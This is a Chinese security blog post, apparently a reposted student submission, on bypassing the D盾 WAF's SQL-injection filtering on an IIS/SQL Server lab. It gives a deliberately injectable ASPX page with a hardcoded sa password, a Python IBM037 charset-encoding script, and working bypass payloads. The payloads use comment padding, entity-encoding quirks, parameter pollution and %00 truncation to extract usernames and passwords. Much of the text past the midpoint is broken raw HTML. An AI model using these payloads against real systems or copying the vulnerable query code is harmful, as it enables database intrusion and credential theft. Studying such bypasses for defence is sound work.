BypassD盾之SQL注入繞過總結 - 網安 - 專業的網絡安全產業、社區、知識平臺

SQLServer特性

空格可以由其它字符替代

select id,contents,time from news where news_id=1①union②select③1,2,db_name()④from⑤admin

位置①
可以利用其它控制字符替換空格：%01~%0F、%11~%1F
可以利用注釋符號：/**/、—+a%0d%0a
可利用數學運算符以及數據類型：news_id=1.0，news_id=1e0，news_id=1-1
位置②
可以利用其它控制字符替換空格：%01~%0F、%11~%1F
可以利用注釋符號：/**/、—+a%0d%0a
可以利用加號+替換空格：union+select
位置③
可以利用其它控制字符替換空格：%01~%0F、%11~%1F
可以利用注釋符號：/**/、—+a%0d%0a
可利用數學運算符：+、-、~、. （注：其中-、~、.號必須是select查詢的第一個字段的數據類型為數字型才能使用）
可以利用小括號()替換空格：select(1),2,db_name()
位置④
可以利用其它控制字符替換空格：%01~%0F、%11~%1F
可以利用注釋符號：/**/、—+a%0d%0a
可利用其他字符：%80~%FF（需要IIS服務器支持）
位置⑤
可以利用其它控制字符替換空格：%01~%0F、%11~%1F
可以利用注釋符號：/**/、—+a%0d%0a
可利用其他字符：%80~%FF（需要IIS服務器支持）
可以利用點號.替換空格：from.users
可以利用中括號[]替換空格：from[users]

實驗環境

數據庫：SQL Server 2008R2

Web服務器：IIS7.5 CN

WAF：D盾_v2.1.6.1[測試版]

靶場源碼如下：index.aspx

<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Data" %>
<%@ Import namespace="System.Data.SqlClient"  %>
"server">
    private DataSet resSet=new DataSet();
    protected void Page_Load(object sender, EventArgs e)
    {
        String strconn = "server=.;database=test;uid=sa;pwd=admin";
        string id = Request.Params["id"];
        string sql = string.Format("select * from newss where id={0}", id);
        SqlConnection connection=new SqlConnection(strconn);
        connection.Open();
        SqlDataAdapter dataAdapter = new SqlDataAdapter(sql, connection);
        dataAdapter.Fill(resSet);
        DgData.DataSource = resSet.Tables[0];
        DgData.DataBind();
        Response.Write("執行語句:
"+sql);
        Response.Write("
結果為:");
    }
"http://www.w3.org/1999/xhtml">
"server">
"Content-Type" content="text/html; charset=utf-8"/>
    SQLServer注入測試
    "form1" runat="server">
    
    
        "DgData" runat="server" BackColor="White" BorderColor="#3366CC" 
            BorderStyle="None" BorderWidth="1px" CellPadding="4" 
                HeaderStyle-CssClass="head" Width="203px">
            "#99CCCC" ForeColor="#003399" />
            "#009999" Font-Bold="True" ForeColor="#CCFF99" />
            "#99CCCC" ForeColor="#003399" HorizontalAlign="Left" 
                Mode="NumericPages" />
            "White" ForeColor="#003399" />
"head" BackColor="#003399" Font-Bold="True" ForeColor="#CCCCFF">

另類字符集編碼繞過

繞過原理

HTTP協議兼容性：HTTP Charset的多樣性

Content-Type頭中使用charset定義字符集的應用場景不只有在responses中，request中同樣可以使用。

常見的服務器與可見編碼如下所示：

服務器信息可用編碼說明Nginx, uWSGI-Django-Python3IBM037, IBM500, cp875, IBM1026, IBM273對參數名和參數值進行編碼，服務器會對參數名和參數值均進行url解碼，需要對等號和& and進行編碼(不進行url編碼)Nginx, uWSGI-Django-Python2IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424對參數名和參數值進行便慢慢服務器會對參數名和參數值均進行url解碼等號和&符號不應該以任何方式編碼。Apache-TOMCAT8-JVM1.8-JSPIBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025參數名按原始格式(可以像往常一樣使用url編碼)Body不論是否經過url編碼均可等號和&符號不應該以任何方式編碼Apache-TOMCAT7-JVM1.6-JSPIBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025參數名按原始格式(可以像往常一樣使用url編碼) Body 不論是否經過url編碼均可等號和&符號不應該以任何方式編碼IIS6, 7.5, 8, 10 -ASPX (v4.x)IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420,IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025參數名按原始格式(可以像往常一樣使用url編碼) Body 不論是否經過url編碼均可等號和&符號不應該以任何方式編碼

實驗步驟

我們使用如下腳本來進行編碼轉換：

import urllib
import sys
params = sys.argv[1]
charset= sys.argv[2]
def paramEncode(params="id=1", charset="IBM037", encodeEqualSign=False, encodeAmpersand=False, urldecodeInput=True, urlencodeOutput=True):
    result = ""
    equalSign = "="
    ampersand = "&"
    if encodeEqualSign:
       equalSign = equalSign.encode(charset)
    if encodeAmpersand:
       ampersand = ampersand.encode(charset)
    params_list = params.split("&")
    for param_pair in params_list:
       param, value = param_pair.split("=")
       if urldecodeInput:
          param = urllib.unquote(param).decode('utf8')
          value = urllib.unquote(value).decode('utf8')
       param = param.encode(charset)
       value = value.encode(charset)
       if urlencodeOutput:
          param = urllib.quote_plus(param)
          value = urllib.quote_plus(value)
       if result:
          result += ampersand
       result += param + equalSign + value
    return result
print(paramEncode(params,charset))

這里我們使用IBM037編碼進行測試。

中文版的BurpSuite需要改變一下BurpSuite的字體類型

image-20211025173724964

然后使用BurpSuite抓包，并發送到Repeater

image-20211025173902801

修改請求方法為POST

image-20211025174140120

在Content-Type頭中添加charset字段，值為ibm037

Content-Type: application/x-www-form-urlencoded;charset=ibm037

image-20211025174228156

使用腳本進行編碼

python2 encode.py "id=1" IBM037
# 返回 %89%84=%F1

將請求內容改為%89%84=%F1，并發送

image-20211025174653394

可以看到正常返回查詢數據

接下來就是進行SQL注入了

image-20211025174846914

成功繞過D盾WAF

D盾清洗數據缺陷+多個規則特性組合繞過

繞過原理

規則缺陷/特性：利用D盾清洗數據的特性

WAF內置多種解碼器，經過多次解碼以后可能導致繞過。

當攻擊者提交的參數值中存在大量干擾數據時，如大量空格、TAB、換行、%0c、注釋等，WAF需要對其進行清洗（為提升性能和降低規則復雜性），篩選出真實的攻擊數據進行檢測，但是，如果清洗方式不正確，會導致真正的攻擊部分被清洗，然后拿去檢測的是不含有攻擊向量的數據，從而被Bypass。

規則缺陷/特性：數據庫空格可使用其它字符替代

替代字符可查看SQLServer特性。

規則缺陷/特性：%00時會被認為讀取已結束

在url中%00表示ascll碼中的0 ，而ascii中0作為特殊字符保留。

規則缺陷/特性：HTTP參數污染

同時提交參數id，會接收所有參數，通過逗號分隔。

實驗步驟

抓包，并更改請求方法

image-20211028161329759

測試D盾清洗數據的特性：

D盾為了防御XSS攻擊會對提交的特殊字符進行HTML實體編碼，例如提交的數據為</code><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.50390625" data-s="300,640" data-type="png" data-w="1280" style="height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpx03St3Gib4tD2bnZ3LCJQibib7K1TU4zEQF18gnuO7u9StL7LatjP3zicMA/640?wx_fmt=png"><figure style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;color: rgb(63, 63, 63);"><figcaption style="text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;">image-20211028162308251</figcaption></figure><p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);">那么假如我們將提交一個已經實體化編碼的數據呢？<img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.8253358925143954" data-s="300,640" data-type="png" data-w="1042" style="height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxVCVfiahWlxoCHeYWzCKg3IeCiavmwQ6nL8GY3WdyyJghTKIhWxXGyZPw/640?wx_fmt=png"><figure style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;color: rgb(63, 63, 63);"><figcaption style="text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;">image-20211028163222933</figcaption></figure><p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);">這里并沒有將<code style="white-space:pre-wrap;line-height: 1.75;font-size: 12.6px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;">></code>進行解碼，而是將<code style="white-space:pre-wrap;line-height: 1.75;font-size: 12.6px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;">&</code>符進行編碼<img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.49517684887459806" data-s="300,640" data-type="png" data-w="1244" style="height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxmUZnXBUW4dZxZnGqvydOhLKWFWwOfT1cYmUrHEyPvWhib1HqTvdvicqw/640?wx_fmt=png"><figure style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;color: rgb(63, 63, 63);"><figcaption style="text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;">image-20211028164318800</figcaption></figure><p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);">我們可以利用這個特性，使用這串字符去繞過某些多個關鍵字匹配的規則，如：union…select、order…by、/*…*/、'…' 等<img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.3109375" data-s="300,640" data-type="png" data-w="1280" style="height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxvrS2esx28GOBTnh9ibRAIpOicVMK2LibOic3yiaib2kicx6afXnthcyTpuNNw/640?wx_fmt=png"><figure style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;color: rgb(63, 63, 63);"><figcaption style="text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;">image-20211028171853112</figcaption></figure><p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);">繞過 and 1=1<p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);">注：1.e可以代替空格<pre style="overflow-x: auto;padding: 1em;background: rgb(248, 248, 248);font-size: 14px;text-align: left;line-height: 1.5;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;border-radius: 8px;margin: 10px 8px;"><code style="line-height: 1.75;font-family: Menlo, "Operator Mono", Consolas, Monaco, monospace;white-space: nowrap;">id=1.eand/*%26%67%74%3b*/1=1</code></pre><figure style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;color: rgb(63, 63, 63);"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.3141945773524721" data-s="300,640" data-type="png" data-w="1254" style="height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxJIpFLfObvKfhz20ibRJlu6yf6KgPcN7wv3wb2ZHj4LeJFojVm6EDVbQ/640?wx_fmt=png"><figcaption style="text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;">image-20211028173512915 </figcaption></figure><p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);">繞過 order by<pre style="overflow-x: auto;padding: 1em;background: rgb(248, 248, 248);font-size: 14px;text-align: left;line-height: 1.5;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;border-radius: 8px;margin: 10px 8px;"><code style="line-height: 1.75;font-family: Menlo, "Operator Mono", Consolas, Monaco, monospace;white-space: nowrap;">id=1 order/*%26%67%74%3b*/by 2</code></pre><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.28329297820823246" data-s="300,640" data-type="png" data-w="1239" style="height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxDzhIkzwnLqgFSGvd7wJgiaImG3NGs7unfs2LTsRe4dS3b6GOS6UVMGw/640?wx_fmt=png"><figure style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;color: rgb(63, 63, 63);"><figcaption style="text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;">image-20211028174034111</figcaption></figure><p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);">繞過 union select<pre style="overflow-x: auto;padding: 1em;background: rgb(248, 248, 248);font-size: 14px;text-align: left;line-height: 1.5;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;border-radius: 8px;margin: 10px 8px;"><code style="line-height: 1.75;font-family: Menlo, "Operator Mono", Consolas, Monaco, monospace;white-space: nowrap;">id=-1.eunion--%26%67%74%3b%0aselect NULL,NULL,NULL</code></pre><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.2703125" data-s="300,640" data-type="png" data-w="1280" style="height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxy5J0TGL8iabLzamKaB6iabb4d98oGpneJYxmtM0nXddCyqXugOvebfSw/640?wx_fmt=png"><p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);">繞過 from<p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);">from的繞過這就是一個技術活了，這里是利用到了HPP以及%00截斷來進行繞過<pre style="overflow-x: auto;padding: 1em;background: rgb(248, 248, 248);font-size: 14px;text-align: left;line-height: 1.5;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;border-radius: 8px;margin: 10px 8px;"><code style="line-height: 1.75;font-family: Menlo, "Operator Mono", Consolas, Monaco, monospace;white-space: nowrap;">id=-1.eunion--%26%67%74%3b%0aselect NULL,username,password/*%26%67%74%3b&id=%00%0d*/from users </code></pre><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.25" data-s="300,640" data-type="png" data-w="1280" style="height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxewvwIpAlaEVJSyyRU9pdEGHcmphHKNOhbtBUic8eIfQoIzx9eEE271A/640?wx_fmt=png"><figure style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;color: rgb(63, 63, 63);"><figcaption style="text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;">image-20211028174713969</figcaption></figure><p data-darkmode-bgcolor-15976329806349="rgb(25, 25, 25)" data-darkmode-original-bgcolor-15976329806349="rgb(255, 255, 255)" data-style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; white-space: normal; background-color: rgb(255, 255, 255);" class="js_darkmode__0" style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);color: rgb(163, 163, 163) !important;"><img class="rich_pages wxw-img" data-ratio="0.109375" data-type="png" data-w="640" style="outline: 0px;box-sizing: border-box !important;visibility: visible !important;width: 640px !important;height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/ndicuTO22p6ibN1yF91ZicoggaJJZX3vQ77Vhx81O5GRyfuQoBRjpaUyLOErsSo8PwNYlT1XzZ6fbwQuXBRKf4j3Q/640?wx_fmt=png"><p data-darkmode-bgcolor-15976329806349="rgb(25, 25, 25)" data-darkmode-original-bgcolor-15976329806349="rgb(255, 255, 255)" data-style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; white-space: normal; background-color: rgb(255, 255, 255);" class="js_darkmode__0" style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: center;color: rgb(163, 163, 163) !important;"> <p data-darkmode-bgcolor-15976329806349="rgb(25, 25, 25)" data-darkmode-original-bgcolor-15976329806349="rgb(255, 255, 255)" data-style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; white-space: normal; background-color: rgb(255, 255, 255);" class="js_darkmode__0" style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: center;color: rgb(163, 163, 163) !important;">推薦閱讀：<p style="outline: 0px;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;"> <p style="outline: 0px;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;"><a target="_blank" textvalue="精華 | SQL注入萬能Bypass技巧" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2" wah-hotarea="click" hasload="1" style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;font-size: 14px;">精華 | SQL注入萬能Bypass技巧</a> <p style="outline: 0px;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;"> <h1 style="outline: 0px;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;"><span style="color: rgb(63, 63, 63);font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 1.4px;text-align: left;">Bypass 護衛神SQL注入防御（多姿勢） https://www.cnblogs.com/xiaozi/p/9138160.html</h1><p style="margin: 1.5em 8px;white-space: normal;font-size: 14px;text-align: center;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.1em;color: rgb(63, 63, 63);">干貨|各種WAF繞過手法學習<p style="margin: 1.5em 8px;white-space: normal;font-size: 14px;text-align: center;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.1em;color: rgb(63, 63, 63);">https://blog.csdn.net/zhangge3663/article/details/116394692<p style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: center;"><a target="_blank" textvalue="Bypass D盾_防火墻（新版）SQL注入防御" linktype="text" imgurl="" imgdata="null" tab="innerlink" style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 1.4px;text-align: left;color: rgb(0, 128, 255);font-size: 14px;" data-linktype="2"><span style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 1.4px;text-align: left;color: rgb(0, 128, 255);">Bypass D盾_防火墻（新版）SQL注入防御</a><span style="color: rgb(63, 63, 63);font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;font-size: 14px;letter-spacing: 1.4px;text-align: left;"><p style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: center;"> <p style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: center;"><strong data-darkmode-bgcolor-15976329806349="rgb(25, 25, 25)" data-darkmode-original-bgcolor-15976329806349="rgb(255, 255, 255)" data-darkmode-color-15976329806349="rgb(255, 104, 39)" data-darkmode-original-color-15976329806349="rgb(255, 104, 39)" style="outline: 0px;color: rgb(255, 104, 39);font-size: 18px;letter-spacing: 0.544px;">點贊，轉發，在看<p data-darkmode-bgcolor-15976329806349="rgb(25, 25, 25)" data-darkmode-original-bgcolor-15976329806349="rgb(255, 255, 255)" data-style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; white-space: normal; background-color: rgb(255, 255, 255); text-align: center;" class="js_darkmode__1" style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: center;color: rgb(163, 163, 163) !important;"> <p data-darkmode-bgcolor-15976329806349="rgb(25, 25, 25)" data-darkmode-original-bgcolor-15976329806349="rgb(255, 255, 255)" data-style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; white-space: normal; background-color: rgb(255, 255, 255); text-align: center;" class="js_darkmode__1" style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: right;color: rgb(163, 163, 163) !important;">原創作者：Ulysses<p data-darkmode-bgcolor-15976329806349="rgb(25, 25, 25)" data-darkmode-original-bgcolor-15976329806349="rgb(255, 255, 255)" data-style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; white-space: normal; background-color: rgb(255, 255, 255); text-align: center;" class="js_darkmode__1" style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: right;color: rgb(163, 163, 163) !important;">內部學員投稿<p data-darkmode-bgcolor-15976329806349="rgb(25, 25, 25)" data-darkmode-original-bgcolor-15976329806349="rgb(255, 255, 255)" data-style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; white-space: normal; background-color: rgb(255, 255, 255); text-align: center;" class="js_darkmode__3" style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: center;color: rgb(163, 163, 163) !important;"><img class="rich_pages __bg_gif wxw-img" data-ratio="0.5197505197505198" data-type="gif" data-w="962" style="outline: 0px;box-sizing: border-box !important;visibility: visible !important;width: 677px !important;height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_gif/Uq8QfeuvouibQiaEkicNSzLStibHWxDSDpKeBqxDe6QMdr7M5ld84NFX0Q5HoNEedaMZeibI6cKE55jiaLMf9APuY0pA/640?wx_fmt=gif"> </section>